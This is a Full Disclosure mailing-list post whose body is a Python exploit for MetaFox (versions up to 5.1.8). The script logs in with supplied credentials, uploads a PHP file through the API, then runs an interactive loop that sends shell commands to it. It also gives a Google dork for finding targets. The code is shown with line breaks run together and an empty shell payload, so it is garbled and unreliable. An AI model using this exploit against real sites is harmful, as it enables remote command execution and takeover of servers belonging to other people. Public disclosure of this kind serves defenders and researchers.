Full Disclosure mailing list archives

#!/usr/bin/env python3# Exploit Title: MetaFox Remote Shell Upload# Google Dork: "Social network for niche 
communities"# Exploit Author: The Joker# Vendor Homepage: https://www.phpfox.com# Version: <= 5.1.8import jsonimport 
requestsimport sysif len(sys.argv) != 4:   sys.exit("Usage: %s " % sys.argv[0])   
requests.packages.urllib3.disable_warnings()endpoint = sys.argv[1] + "/api/v1/user/login"response = 
requests.post(endpoint, json={"username": sys.argv[2], "password": sys.argv[3]}, verify=False)json_response = 
json.loads(response.text)if not "access_token" in json_response:   sys.exit("Login failed!")print("Login success! 
Uploading shell")token = json_response["access_token"]endpoint = sys.argv[1] + "/api/v1/files"files = {"file[0]": 
("wtf.php", "")}response = requests.post(endpoint, files=files, headers={"Authorization": "Bearer " + token}, 
verify=False)json_response = json.loads(response.text)if not "data" in json_response or not "url" in 
json_response["data"][0]:   sys.exit("Upload failed!")shell_url = json_response["data"][0]["url"]print("Shell uploaded 
at %s\n" % shell_url)while True:   command = input("$ ")   response = requests.post(shell_url, data={"command": 
command}, verify=False)   print(response.text)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

• MetaFox Remote Shell Upload Exploit [email protected] (Mar 13)